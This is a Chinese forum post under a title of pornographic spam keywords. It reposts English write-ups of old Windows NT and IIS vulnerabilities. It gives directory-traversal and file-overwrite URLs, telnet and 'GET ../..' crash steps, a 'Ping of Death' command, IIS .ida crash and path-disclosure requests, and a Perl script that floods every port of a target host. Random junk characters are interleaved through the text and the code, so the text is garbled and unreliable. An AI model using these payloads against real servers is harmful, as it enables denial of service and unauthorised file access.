亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

  • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>
    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>

    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0( |* k9 t9 R0 g- x& I
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      3 h2 Z/ K, q4 U  B0 U
      . s* i+ Z; d, XA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.8 W2 J0 R6 b2 k/ a2 Q# X) c1 n9 [) B" P

      ! g' H( ^7 C- N" iBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests./ U5 d9 P  s* W, o: {& ~" d$ s

      6 v% U/ B* {! |& W) C+ X4 p: b--------------------------------------------------------------------
      $ s' x7 P4 b, l" s
      0 f5 r* e. [7 K2 w. F) q受影響系統(tǒng):4.02 x0 }0 e1 K; H) }2 H
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      ! n* J# m' D) K- l( W( X9 }5 Y/ I! R- i
      If the file 'target.bat' exists, the file will be truncated.2 Y1 ]; B% a6 J

      + c4 H; W- K7 j$ [
      2 n5 i; G. l' T1 ?3 W- w  K" CA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''./ S0 ~+ B" k; K% X7 }1 x8 f

      * E! w: N. Q, {5 H' w. @7 y1 s3 l0 f----------------------------------------------------------------------
      + O# H% b6 u: y! \7 Z
      4 A1 t* U4 ~1 |8 s+ m; `0 h受影響系統(tǒng):3.51,4.02 k" _9 S% A1 r6 U' D- F
      Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      : J4 v1 _. f! w
      & Q' E1 H" [6 `7 I$ s  PThe following steps;
      ' M4 O4 V% c5 j- H& x) S# H) _% w3 ^2 Y) W8 s
      Telnet to an NT 4.0 system on port 135 2 d" ^8 j* I# I( P" @' K6 R6 |. ?  l
      Type about 10 characters followed by a <CR>
      # Z! S: `! ]( }) r6 T4 eExit Telnet
      1 v- o" [/ A7 L+ ^# a1 w" Sresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      - R2 X9 V. G& c, |, w4 K: a! N6 V& e* [1 M' H6 i* Q# R
      When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
      4 C- V5 F+ ?4 f' D# k! q: l3 O% \, y) @* U& B' J: g
      The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      : _) Y, b* ^: k- `9 v5 {0 l& `2 K2 s' l5 w2 y8 D5 b3 H" @
      If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.8 A) m' e: `0 V9 m$ N3 q

      & K8 z, U+ I7 uThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ \6 N% Q; q$ M' P3 D) A
      3 z: A8 m. R& w# |$ \4 x
      /*begin poke code*/2 L( v  ?" M- K4 U7 }7 |. t
      * _  y0 }2 d1 {
      use Socket;
      + c5 o" }) `5 X5 W, }- Ause FileHandle;
      0 w# s# P( X- d3 B' q* t( Yrequire "chat2.pl";; L. ~, k7 Z+ E% y+ b. P% Y
      2 P9 |; U# ?- c2 i7 F0 C! q
      $systemname = $ARGV[0] && shift;) D4 h6 e$ U5 M7 n" x4 ~
      2 z8 f" ]7 ?/ o# G5 a9 |  D
      $verbose = 1; # tell me what you're hitting
      & F0 |  T% R% M$knownports = 1; # don't hit known problem ports5 M6 J& X3 h& j8 W% e
      for ($port = $0; $port<65535; $port++)
      6 E; L: p, b& C/ N" \. J3 r{
      ) Y: ?. b; T4 r6 r" b* a6 l$ n  s0 w6 t- c1 D! [2 s# \: I# n8 t
      # C$ Q$ ~+ \  D1 m2 Z
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {3 w& A! g. b0 E  {- G" |$ r# Z
      next;
      7 ^$ i& r4 W# Z; y5 b1 R# d}
      ; o1 k% d7 u2 _4 m$fh = chat::open_port($systemname, $port);% \" _) O& N- M& x
      chat::print ($fh,"This is about ten characters or more");4 T- v) k7 B6 p& ?/ `, u. a8 S
      if ($verbose) {# A+ j  v! i3 T2 ~+ X
      print "Trying port: $port\n";
      , Z9 @6 _& z% q1 z  z5 B} + {" [: |9 o; i4 V
      chat::close($fh);
      $ i1 m$ a8 ~0 |: d8 E% q6 }, y1 t* T9 t, Z5 U
      }
      7 b  e7 w; g% A+ F( ]
      & i5 \2 j0 o1 i
      3 D1 E" f  e0 n/*end poke code*/+ ^1 n2 l( p; T% k

      7 _/ Z, Z6 ^. h' a/ l/ RSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername7 D# ?5 z+ t/ L
      3 \9 |- X" W8 t+ I3 w
      --------------------------------------------------------------------------------: B; Y* T1 h- J  ~# t! f: T) W% {

      0 I4 [8 t: p3 g9 k" [受影響系統(tǒng):4.0& @( D+ x: b9 Z# |5 q0 S3 c
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.+ N; M9 m* e7 L# f7 I' I
      : V0 E5 u! P* a$ V7 b% T6 `
      This attack causes Dr. Watson to display an alert window and to log an error: # S, N, E: z' N/ e0 u1 a7 j
      5 v! E6 {' h; ^4 w- a: b1 ^( x+ R
      "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      ; V( `# Y' c4 o2 [  |$ @& u+ m
      2 |+ u. I8 D/ k4 w--------------------------------------------------------------------------------
      1 L# u) ^* V1 O) P; o9 \. \; {0 f: l/ A/ J: Y
      受影響系統(tǒng):3.51,4.0
      6 X6 X; H4 u! o% dLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
      : D9 o0 [0 U2 n% P/ N) s3 m- u0 ?6 L! q% X0 F5 J$ G
      STOP: 0X0000001E1 C: x* j  {4 f' p
      KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      2 s2 W# v2 K/ K* n, v2 ?
      5 z5 y9 [4 v& U- K* S3 s+ O/ @-OR-( M/ l/ W2 Z- W: Z# k; E( g

      3 ~9 o. j: F" o& s8 dSTOP: 0x0000000A
      ! @. w6 k& ~0 a" qIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS" }+ o; [2 [& S; v, e- z
      ; a( w3 J0 L5 w
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      0 `# O  \* \5 J4 }" G8 a  C  p) m  H4 U4 J* K4 N0 J
      --------------------------------------------------------------------------------
      ! n, ]6 L' ^2 D0 L- P/ ]- S
      6 {, B- ]$ Y4 u( AMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
      7 |8 ^1 V; ?7 K+ [, T$ K+ _
      3 ^; D8 i' g  u. p/ [--------------------------------------------------------
      , o. W+ R# I7 p6 U
      3 l; d# i* f* Y" |- W( |IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-4-10 01:25

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表